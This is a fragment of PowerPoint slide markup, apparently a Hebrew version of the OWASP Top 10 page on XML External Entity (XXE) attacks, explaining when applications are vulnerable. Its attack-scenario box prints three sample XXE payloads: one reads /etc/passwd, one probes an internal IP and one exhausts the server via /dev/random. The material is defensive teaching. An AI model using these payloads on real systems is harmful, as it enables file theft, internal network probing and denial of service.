                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PII</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) כגון רשומות רפואיות, נתוני הזדהות, מידע אישי ונתוני כרטיסי אשראי אשר לעיתים קרובות מחויב בהגנה בהתאם לחוקים ורגולציות כגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EU GDPR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> או חוקי פרטיות מקומיים.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="2880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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35446034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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474005" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מספר רב של מקרי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> פומביים התגלו, לרבות מתקפות כלפי התקני </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. מתקפת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> קורית במספר רב של מקרים בלתי צפויים, לרבות תלויות החבויות עמוק בקוד. הדרך הפשוטה ביותר לניצול היא באמצעות העלאת קובץ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> זדוני, ובמידה ומצליח:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> התוקף מנסה לחלץ מידע מהשרת:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xml version="1.0" encoding="ISO-8859-1"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;!DOCTYPE foo [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;!ELEMENT foo ANY &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> התוקף מאזין לרשת הפנימית של השרת באמצעות שינוי ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ENTITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מעלה ל:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> התוקף מנסה לבצע מתקפת מניעת שירות ע"י הוספת קובץ עם ערך אין-סופי:</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "file:///dev/random" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יישומים ובייחוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מבוססי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או שילוב עם יישומים נוספים (בהמשך) עשויים להיות פגיעים להתקפה במידה ו:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>היישום מאפשר לקבל קבצי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בצורה ישירה או העלאה של קבצי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, בייחוד ממקורות בלתי-מאומתים, או מאפשר הכנסת מידע לא מאומת לתוך קבצי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
